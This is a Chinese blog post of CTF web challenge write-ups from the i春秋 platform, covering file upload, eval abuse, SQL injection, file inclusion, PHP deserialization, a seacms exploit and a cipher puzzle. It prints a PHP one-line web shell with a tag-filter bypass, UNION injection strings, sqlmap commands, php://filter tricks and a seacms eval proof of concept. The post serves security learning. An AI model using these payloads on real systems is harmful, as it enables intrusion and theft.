<!DOCTYPE HTML>
<html lang="en">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="i春秋-1, shiango">
    <meta name="description" content="A Freshman">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>i春秋-1 | shiango</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="shiango" type="application/atom+xml">
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">shiango</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>Index</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>Tags</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>Categories</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>Archives</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>About</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>Contact</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>Friends</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="Search" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">shiango</div>
        <div class="logo-desc">
            
            A Freshman
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			Index
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			Tags
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			Categories
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			Archives
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			About
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			Contact
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			Friends
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/11.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">i春秋-1</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/ctf%E9%A2%98%E7%9B%AE-web/">
                                <span class="chip bg-color">ctf题目--web</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>Publish Date:&nbsp;&nbsp;
                    2022-02-06
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h3 id="1-前言"><a href="#1-前言" class="headerlink" title="1.前言"></a>1.前言</h3><p><img src="/images/1.4.png" alt="1.4"></p>
<p>开始刷i春秋了。现在开始重点讲一讲自己做题过程中新的知识点，然后一些题目类型，思路。</p>
<h3 id="2-题目"><a href="#2-题目" class="headerlink" title="2.题目"></a>2.题目</h3><h5 id="1-upload"><a href="#1-upload" class="headerlink" title="1.upload"></a>1.upload</h5><p>文件上传的题目核心是上传一句话木马，然后连接数据库获取目标文件。</p>
<p>查看访问的文件发现直接打印出来了，发现有存在过滤&lt;?php。</p>
<p>这一题学到了的是怎么绕过过滤关键字的方法：试试其他的php标记写法</p>
<p>用网页脚本:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language=&quot;php&quot;&gt;@eval($_POST[&#x27;a&#x27;])&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<? echo ("这是一个 PHP 语言的嵌入范例\n"); ?>
<?php echo("这是第二个 PHP 语言的嵌入范例\n"); ?>

<script language="php"> 
echo ("这是类似 JavaScript 及 VBScript 语法
的 PHP 语言嵌入范例");
</script>
<p>&lt;% echo (“这是类似 ASP 嵌入语法的 PHP 范例”); %&gt;</p>
<? ?><p>和&lt;% %&gt;的使用需要开启php.ini文件中的short_open_tag,不然会报错</p>
<p>在本题中，也可以用&lt;% %&gt;绕过。可自行尝试。</p>
<p>但是用菜刀访问时还是遇到问题：</p>
<p><img src="/images/1-16443061825691.png" alt="1"></p>
<p>提示php被过滤了，所以我们双/大写绕过。</p>
<p>pHp,然后我们怎么明确目录呢，看上传成功页面的源码</p>
<p><img src="/images/2-16443068843451.png" alt="2"></p>
<p>所以在找flag时要上一级目录找找。</p>
<p><img src="/images/1.3.png" alt="1.3"></p>
<h5 id="2-爆破-1"><a href="#2-爆破-1" class="headerlink" title="2.爆破-1"></a>2.爆破-1</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include &quot;flag.php&quot;;</span><br><span class="line">$a=@$_REQUEST[&#x27;hello&#x27;];</span><br><span class="line">if(!preg_match(&#x27;/^\w*$/&#x27;,$a ))&#123; </span><br><span class="line">die(&#x27;ERROR&#x27;);</span><br><span class="line">&#125;</span><br><span class="line">eval(&quot;var_dump($$a);&quot;);</span><br><span class="line">show_source(__FILE__);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>eavl() 函数把里面的字符当做php代码<br>var_dump() 一个把变量里面的值成列出来<br>这里访问全局变量GLOBALS即可。</p>
<p>就不需要一个个拆解了。<img src="/images/2.1-16443222571211.png" alt="2.1"></p>
<h5 id="3-爆破-2"><a href="#3-爆破-2" class="headerlink" title="3.爆破-2"></a>3.爆破-2</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include &quot;flag.php&quot;;</span><br><span class="line">$a = @$_REQUEST[&#x27;hello&#x27;];</span><br><span class="line">eval( &quot;var_dump($a);&quot;);</span><br><span class="line">show_source(__FILE__);</span><br></pre></td></tr></table></figure>

<p>这里的理解是@$_REQUEST（）函数里的值为$a,是$a=global,而不是$a=$global.</p>
<p>所以这题flag不在变量中猜想flag在文件中，我们采用file_get_contents()函数来获取把整个文件读入一个字符串中。</p>
<p>这里在源码中可以找到注释的flag，php文件不显示为网页，所以到源码里找。</p>
<p>或者也可以用file（）函数把整个文件读入一个数组中</p>
<p>这里在网页就有回显。</p>
<p><a target="_blank" rel="noopener" href="http://eci-2zehj54thxnt2ylc96tm.cloudeci1.ichunqiu.com/?hello=file(%27flag.php%27)">http://eci-2zehj54thxnt2ylc96tm.cloudeci1.ichunqiu.com/?hello=file(%27flag.php%27)</a></p>
<h5 id="4-SQL"><a href="#4-SQL" class="headerlink" title="4.SQL"></a>4.SQL</h5><p>遇到sql题目，好好复习一下，顺便看看在赛题中的出题角度。</p>
<p>思路：这一题看注释可以发现是数字型sql,然后正常套路中发现标注了inj code是存在过滤后，然后用bp来fuzz一下，然后找到绕过方法后用脚本跑一下就行，但是这里其实不用盲注脚本，手动亦可。</p>
<p>有些忘记了那些绕过方法，要在整理一篇sql笔记。</p>
<h5 id="5-文件包含"><a href="#5-文件包含" class="headerlink" title="5.文件包含"></a>5.文件包含</h5><p>在bugku21题中有讲过伪协议。</p>
<p>php://input（php&gt;5.0 allow_url_include=on）</p>
<p>协议查看当前目录下的文件</p>
<p>用post传递系统命令执行</p>
<p>利用php://filter/read=convert.base64-encode/resource=xxx.php查看xxx.php文件的内容。</p>
<h5 id="6-爆破-3"><a href="#6-爆破-3" class="headerlink" title="6.爆破-3"></a>6.爆破-3</h5><p>看到php的一大堆源码</p>
<p>我们要做的就是从中审计出关键的部分，从中作为题目的入手点</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php error_reporting(0);</span><br><span class="line">session_start();require(&#x27;./flag.php&#x27;);</span><br><span class="line">if(!isset($_SESSION[&#x27;nums&#x27;]))&#123;</span><br><span class="line">$_SESSION[&#x27;nums&#x27;] = 0;</span><br><span class="line">$_SESSION[&#x27;time&#x27;] = time(); </span><br><span class="line">$_SESSION[&#x27;whoami&#x27;] = &#x27;ea&#x27;;</span><br><span class="line">&#125;</span><br><span class="line">if($_SESSION[&#x27;time&#x27;]+120&lt;time())&#123; session_destroy();</span><br><span class="line">&#125;</span><br><span class="line">$value = $_REQUEST[&#x27;value&#x27;];</span><br><span class="line">$str_rand = range(&#x27;a&#x27;, &#x27;z&#x27;);</span><br><span class="line">$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];if($_SESSION[&#x27;whoami&#x27;]==($value[0].$value[1]) &amp;&amp; substr(md5($value),5,4)==0)&#123; </span><br><span class="line">$_SESSION[&#x27;nums&#x27;]++; </span><br><span class="line">$_SESSION[&#x27;whoami&#x27;] = $str_rands;</span><br><span class="line">echo $str_rands;</span><br><span class="line">&#125;</span><br><span class="line">if($_SESSION[&#x27;nums&#x27;]&gt;=10)&#123; </span><br><span class="line">echo $flag;</span><br><span class="line">&#125;</span><br><span class="line">show_source(__FILE__);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>这里我认为是关键</p>
<p>if($_SESSION[‘whoami’]==($value[0].$value[1]) &amp;&amp; substr(md5($value),5,4)==0){<br>$_SESSION[‘nums’]++;<br>$_SESSION[‘whoami’] = $str_rands;<br>echo $str_rands;<br>}<br>if($_SESSION[‘nums’]&gt;=10){<br>echo $flag；</p>
<p>有一个时间限制120（不清楚是分钟还是秒，不过都不影响，时间都挺充足），由==可看出为弱判断类型，可以用数组进行绕过，md5()==0，$str_rands有回显看着修改就好，number爆破次数超过十次即可。</p>
<h5 id="7-upload"><a href="#7-upload" class="headerlink" title="7.upload"></a>7.upload</h5><p>这题是常规的上传一句话木马修改文件类型，连接数据库后发现</p>
<p>没有找到flag，然后翻到config里发现有配置数据库的内容，所以我们连接一下mysql数据库。</p>
<p><img src="/images/7-16443607690431.png" alt="7"></p>
<p><img src="/images/7.1-16443607719942.png" alt="7.1"></p>
<p>或者直接在这里改也可以。</p>
<p><img src="/images/7.3.png" alt="7.3"></p>
<p>一开始并没有回显，要修改行数。<img src="/images/7.4.png" alt="7.4"></p>
<h5 id="8-sql注入-1–NBOOK"><a href="#8-sql注入-1–NBOOK" class="headerlink" title="8.sql注入-1–NBOOK"></a>8.sql注入-1–NBOOK</h5><p>过滤类型我目前遇到有一种是记录型的，关键词会被标记回显注入，另一种属于过滤型会被吸收掉然后回显报错。</p>
<p>像这一题，其实用fuzz由于不属于前者，所以其实不好fuzz，然后我们就掌握常见关键词的绕过方法代入才是最重要的。</p>
<p>过滤贯彻始终，切记角度要广。</p>
<p>1.手注完整的一遍套路为：</p>
<p>判断注入点和类型</p>
<p>union联合注入记得是把where放在所有数据最后，所以最好在做后一个显示位（显示位没有限定）</p>
<p>判断列数：id=1’ order by  1–+</p>
<p>判断库： union select 1,2,database()–+</p>
<p>判断表：union select 1,2,group_concat(table_name) from  information_schema.tables where table_schema=database()–+</p>
<p>判断列：union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’xxx’–+</p>
<p>判断字段：union select 1,2,group_concat(xxx) from xxx(表名)–+</p>
<p>2.sqlmap</p>
<p>这里的网页是初始化的，不需要我们判断些什么。</p>
<p>爆库：python sqlmap.py -u <a target="_blank" rel="noopener" href="http://eci-2zehj54thxntegxtwsmd.cloudeci1.ichunqiu.com/index.php?id=1">http://eci-2zehj54thxntegxtwsmd.cloudeci1.ichunqiu.com/index.php?id=1</a> –dbs</p>
<p>一直yes即可。</p>
<p>爆表：python sqlmap.py <a target="_blank" rel="noopener" href="http://eci-2zehj54thxntegxtwsmd.cloudeci1.ichunqiu.com/index.php?id=1">http://eci-2zehj54thxntegxtwsmd.cloudeci1.ichunqiu.com/index.php?id=1</a> -D note –tables</p>
<p>爆列：python sqlmap.py <a target="_blank" rel="noopener" href="http://eci-2zehj54thxntegxtwsmd.cloudeci1.ichunqiu.com/index.php?id=1">http://eci-2zehj54thxntegxtwsmd.cloudeci1.ichunqiu.com/index.php?id=1</a> -D note -T fl4g –columns</p>
<p>爆字段：python sqlmap.py <a target="_blank" rel="noopener" href="http://eci-2zehj54thxntegxtwsmd.cloudeci1.ichunqiu.com/index.php?id=1">http://eci-2zehj54thxntegxtwsmd.cloudeci1.ichunqiu.com/index.php?id=1</a> -D note -T fl4g -C fllllag –dump</p>
<h5 id="9-login"><a href="#9-login" class="headerlink" title="9.login"></a>9.login</h5><p>打开题目是两个登录框，首先判断是不是注入，尝试各种语句发现不是，然后查看网页源代码看到注释里有一些奇怪的字母，猜想是账号密码。</p>
<p>是账号密码后大概率不是注入了，登录后发现是颜表情，然后页面没有有用信息我们抓包或源码或控制台，然后是抓包后的回显参数比较特殊，修改发包得源码：</p>
<p>在注释中审计一下源码：</p>
<!-- 

<?php
    include 'common.php';
    $requset = array_merge($_GET, $_POST, $_SESSION, $_COOKIE);

**有类考虑序列化**

​    class db
​    {
​        public $where;
​        function __wakeup()
​        {
​            if(!empty($this->where))
​            {
​                $this->select($this->where);
​            }
​        }

        function select($where)
        {
            $sql = mysql_query('select * from user where '.$where);
            return @mysql_fetch_array($sql);
        }
    }
    
    if(isset($requset['token']))//插入token爆出flag
    {
        $login = unserialize(gzuncompress(base64_decode($requset['token'])));
        $db = new db();
    $row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\'');
        if($login['user'] === 'ichunqiu')
        {
            echo $flag;
        }else if($row['pass'] !== $login['pass']){
            echo 'unserialize injection!!';
        }else{
            echo "(╯‵□′)╯︵┴─┴ ";
        }
    }else{
        header('Location: index.php?error=1');
    }

?>

 -->(╯‵□′)╯︵┴─┴

<p>关键语句：</p>
<p>if($login[‘user’] === ‘ichunqiu’)<br>    {<br>        echo $flag;</p>
<p>又$login = unserialize(gzuncompress(base64_decode($requset[‘token’])));</p>
<p>这里我的理解：是输入的数值经过怎样加工的方法，是反序列化，那我们要得到就要有相对抵消的过程，使打印出来的结果可以得到我们想要的值。这里有压缩gzcompress和解压gzuncompress，常常用于大数据</p>
<p>，这里也使用于数据传输。常与反序列化一同使用。这里源码告诉我们只有token值才能打印出flag，对于这种我们只要进行序列化即可。</p>
<?php

$a=array('user'=>'ichunqiu');

$un=serialize($a);

$zp=gzcompress($un);

$de=base64_encode($zp);

echo($de);

?>

<p>PHP在线运行后为token。</p>
<p>在cookie中加token。</p>
<p><strong>总结</strong></p>
<p>注释里的东西可以先试试，抓包，多看看有没有奇怪的东西。</p>
<h5 id="10-破译"><a href="#10-破译" class="headerlink" title="10.破译"></a>10.破译</h5><p>说实话这一题作为一个很菜的web手的我一点思路都没有，偷看了wp：</p>
<p>这一题是凯撒移位密码：</p>
<p>初步猜测，应该是一种替换密码，因为就像是几个几个的单词，那么到底是凯撒这种移位密码还是有专门密码表的呢。</p>
<p>看到底部的明显提示，就是感觉{}，像是经过替换一样。X8SY与FLAG除了数字偏移都是18，</p>
<p>那么就是凯撒密码偏移字母，数字替换字母的联合加密了。</p>
<p>所以开干：</p>
<p>TW5650Y - 0TS UZ50S S0V  LZW UZ50WKW 9505KL4G 1X WVMUSL510 S001M0UWV 910VSG S0 WFLW0K510 1X LZW54 WF5KL50Y 2S4L0W4KZ52 L1 50U14214SLW X5L0WKK S0V TSK7WLTS88 VWNW8129W0L  50 W8W9W0LS4G, 95VV8W S0V Z5YZ KUZ118K SU41KK UZ50S.LZW S001M0UW9W0L ESK 9SVW SL S K5Y050Y UW4W910G L1VSG TG 0TS UZ50S UW1 VSN5V KZ1W9S7W4 S0V  FM LS1, V54WUL14 YW0W4S8 1X LZW 50LW40SL510S8 U112W4SL510 S0V WFUZS0YW  VW2S4L9W0L 1X LZW 9505KL4G 1X WVMUSL510.<br>“EW S4W WFU5LWV L1 T41SVW0  1M4 2S4L0W4KZ52 E5LZ LZW 9505KL4G 1X WVMUSL510 L1 9S7W S 810Y-8SKL50Y  592SUL 10 LZW 85NWK 1X UZ50WKW KLMVW0LK LZ41MYZ S 6150L8G-VWK5Y0WV  TSK7WLTS88 UM445UM8M9 S0V S E5VW 4S0YW 1X KUZ118 TSK7WLTS88 241Y4S9K,”  KS5V KZ1W9S7W4. “LZ5K U1995L9W0L 9S47K S01LZW4 958WKL10W 50 LZW 0TS’K  G1MLZ S0V TSK7WLTS88 VWNW8129W0L WXX14LK 50 UZ50S.” X8SY {  YK182V9ZUL9STU5V}</p>
<p>（1）字母移位脚本：</p>
<p>miwen = “TW5650Y - 0TS UZ50S S0V LZW UZ50WKW 9505KL4G 1X WVMUSL510 S001M0UWV 910VSG S0 WFLW0K510 1X LZW54 WF5KL50Y 2S4L0W4KZ52 L1 50U14214SLW X5L0WKK S0V TSK7WLTS88 VWNW8129W0L 50 W8W9W0LS4G, 95VV8W S0V Z5YZ KUZ118K SU41KK UZ50S.LZW S001M0UW9W0L ESK 9SVW SL S K5Y050Y UW4W910G L1VSG TG 0TS UZ50S UW1 VSN5V KZ1W9S7W4 S0V FM LS1, V54WUL14 YW0W4S8 1X LZW 50LW40SL510S8 U112W4SL510 S0V WFUZS0YW VW2S4L9W0L 1X LZW 9505KL4G 1X WVMUSL510.&quot;EW S4W WFU5LWV L1 T41SVW0 1M4 2S4L0W4KZ52 E5LZ LZW 9505KL4G 1X WVMUSL510 L1 9S7W S 810Y-8SKL50Y 592SUL 10 LZW 85NWK 1X UZ50WKW KLMVW0LK LZ41MYZ S 6150L8G-VWK5Y0WV TSK7WLTS88 UM445UM8M9 S0V S E5VW 4S0YW 1X KUZ118 TSK7WLTS88 241Y4S9K,&quot; KS5V KZ1W9S7W4. &quot;LZ5K U1995L9W0L 9S47K S01LZW4 958WKL10W 50 LZW 0TS’K G1MLZ S0V TSK7WLTS88 VWNW8129W0L WXX14LK 50 UZ50S.&quot; X8SY { YK182V9ZUL9STU5V}” </p>
<p>res = ‘’ </p>
<p>offset = 18 # 偏移量是18 </p>
<p><strong>for</strong> i, enu <strong>in</strong> enumerate(miwen):   </p>
<p> tem = ord(enu)   </p>
<p> <strong>if</strong> tem&gt;=65 <strong>and</strong> tem&lt;=90:      </p>
<p>​     <strong>if</strong> tem-offset&gt;=65:         </p>
<p>​           res += chr(tem-offset)       </p>
<p>​    <strong>else</strong>:           </p>
<p>​           res += chr(tem+26-offset)    </p>
<p><strong>else</strong>:       </p>
<p> res += enu </p>
<p>print(res)</p>
<p>（2）或者用米斯拉工具猜测。</p>
<p>初步结果：BE5650G - 0BA CH50A A0D THE CH50ESE 9505ST4O 1F EDUCAT510 A001U0CED 910DAO A0 ENTE0S510 1F THE54 EN5ST50G 2A4T0E4SH52 T1 50C14214ATE F5T0ESS A0D BAS7ETBA88 DEVE8129E0T 50 E8E9E0TA4O, 95DD8E A0D H5GH SCH118S AC41SS CH50A.THE A001U0CE9E0T MAS 9ADE AT A S5G050G CE4E910O T1DAO BO 0BA CH50A CE1 DAV5D SH1E9A7E4 A0D NU TA1, D54ECT14 GE0E4A8 1F THE 50TE40AT510A8 C112E4AT510 A0D ENCHA0GE DE2A4T9E0T 1F THE 9505ST4O 1F EDUCAT510.”ME A4E ENC5TED T1 B41ADE0 1U4 2A4T0E4SH52 M5TH THE 9505ST4O 1F EDUCAT510 T1 9A7E A 810G-8AST50G 592ACT 10 THE 85VES 1F CH50ESE STUDE0TS TH41UGH A 6150T8O-DES5G0ED BAS7ETBA88 CU445CU8U9 A0D A M5DE 4A0GE 1F SCH118 BAS7ETBA88 241G4A9S,” SA5D SH1E9A7E4. “TH5S C1995T9E0T 9A47S A01THE4 958EST10E 50 THE 0BA’S O1UTH A0D BAS7ETBA88 DEVE8129E0T EFF14TS 50 CH50A.” F8AG { GS182D9HCT9ABC5D}</p>
<p>F8AG { GS182D9HCT9ABC5D}</p>
<p>FLAG{GSOLPDMHCTMABCID }</p>
<p>对于数字替换字母：</p>
<p>因为加密前的明文肯定是有意义的，不然也不会给出一大篇文章。所以我们就看看有没有能猜测出意思的单词替换。</p>
<p>或者可以放在这种网站上排列组合猜<a target="_blank" rel="noopener" href="https://www.morewords.com/">搜索词典 单词游戏 填字游戏和字谜 - 更多 单词 (morewords.com)</a></p>
<p><img src="../images/10-16444036452501.png" alt="10"></p>
<p>CH50A-&gt;CHINA</p>
<p>5 I        0  N      8 L   </p>
<p>DEVE8129E0T-&gt;DEVELOPMENT</p>
<p>1 o       2 P      9 M </p>
<h5 id="11-Test"><a href="#11-Test" class="headerlink" title="11.Test"></a>11.Test</h5><p>“百度杯”CTF比赛 九月场</p>
<p>这一题又学到新的出题角度。这题是简单的漏洞复现，但是也是漏洞挖掘的基础。</p>
<p>这是一道有关于seacms的漏洞，在百度上是可以搜索到的。为什么我们知道说要从网站漏洞入手，这是因为说题目有提示让我们去搜查资料。</p>
<p>到时候专门总结一下cms漏洞。</p>
<p>这题网上也已经有漏洞复现了，有现成的poc：url+/search.php?searchtype=5&amp;tid=&amp;area=eval($_POST[1])</p>
<p>这题还可以学习一下蚁剑中数据库配置编写（同第八题中没有看到flag一样，我们要到配置文件中去修改数据库连接）。</p>
<p>先查找一下数据库的连接文件</p>
<p>数据库管理：图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS支持ADO方式连接的数据库。(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)关于配置信息怎么填？</p>
<p>PHP脚本：<T>类型</T> 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种<H>主机地址<H> 主机地址可为机器名或IP地址，如localhost<U>数据库用户</U> 连接数据库的用户名，如root<P>数据库密码</P> 连接数据库的密码，如123455</p>
<p>ASP和ASP.NET脚本：<T>类型</T> 类型只能填ADO<C>ADO配置信息</C>ADO连接各种数据库的方式不一样。如MSSQL的配置信息为Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456<br><img src="../images/11-16444036576572.png" alt="11"></p>
<p>这种~就不用管他了。</p>
<h5 id="12-123"><a href="#12-123" class="headerlink" title="12.123"></a>12.123</h5><p>看了wp才知道这个123123是爆破。</p>
<p>其实这题只要想到备份文件.bak,其他就没有难度了。</p>
